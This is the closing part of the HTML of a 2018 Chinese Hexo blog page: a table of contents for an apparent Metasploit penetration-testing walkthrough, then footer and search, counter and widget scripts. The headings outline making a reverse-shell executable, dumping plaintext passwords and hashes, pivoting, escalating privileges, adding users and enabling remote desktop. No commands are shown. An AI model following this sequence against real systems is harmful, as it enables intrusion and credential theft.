class="nav-text">反弹shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#制作反弹Shell-exe-文件"><span class="nav-number">2.5.1.</span> <span class="nav-text">制作反弹Shell exe 文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#配置MSF"><span class="nav-number">2.5.2.</span> <span class="nav-text">配置MSF</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#迁移进程"><span class="nav-number">2.6.</span> <span class="nav-text">迁移进程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#信息收集"><span class="nav-number">2.7.</span> <span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#抓取明文密码"><span class="nav-number">2.7.1.</span> <span class="nav-text">抓取明文密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#远程桌面与截屏"><span class="nav-number">2.7.2.</span> <span class="nav-text">远程桌面与截屏</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#扩大战果"><span class="nav-number">2.8.</span> <span class="nav-text">扩大战果</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#查看arp-缓存"><span class="nav-number">2.8.1.</span> <span class="nav-text">查看arp 缓存</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看路由信息"><span class="nav-number">2.8.2.</span> <span class="nav-text">查看路由信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#添加路由"><span class="nav-number">2.8.3.</span> <span class="nav-text">添加路由</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看添加的路由信息"><span class="nav-number">2.8.4.</span> <span class="nav-text">查看添加的路由信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#端口扫描"><span class="nav-number">2.8.5.</span> <span class="nav-text">端口扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#版本信息测探"><span class="nav-number">2.8.6.</span> <span class="nav-text">版本信息测探</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#再次渗透攻击"><span class="nav-number">2.9.</span> <span class="nav-text">再次渗透攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#切入会话-5"><span class="nav-number">2.9.1.</span> <span class="nav-text">切入会话 5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看权限"><span class="nav-number">2.9.2.</span> <span class="nav-text">查看权限</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#尝试提权"><span class="nav-number">2.9.3.</span> <span class="nav-text">尝试提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#进程迁移"><span class="nav-number">2.9.4.</span> <span class="nav-text">进程迁移</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#尝试导出账户hash-值"><span class="nav-number">2.9.5.</span> <span class="nav-text">尝试导出账户hash 值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看IP信息"><span class="nav-number">2.9.6.</span> <span class="nav-text">查看IP信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#开启远程桌面连接"><span class="nav-number">2.9.7.</span> <span class="nav-text">开启远程桌面连接</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#添加用户"><span class="nav-number">2.9.8.</span> <span class="nav-text">添加用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#端口转发"><span class="nav-number">2.9.9.</span> <span class="nav-text">端口转发</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#远程桌面登录"><span class="nav-number">2.9.10.</span> <span class="nav-text">远程桌面登录</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart" id="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">guolala</span>

  

  
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v6.5.0</div>


-->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
  </script>
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
      
        
      
  
  <script type="text/javascript" color="0,0,255" opacity="0.5" zindex="-1" count="99" src="true"></script>













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.5.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.5.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.5.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.5.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.5.0"></script>



  



  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  
  

  

  

  

  

  

  

  <script type="text/javascript" src="/js/src/love.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/assets/wanko.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>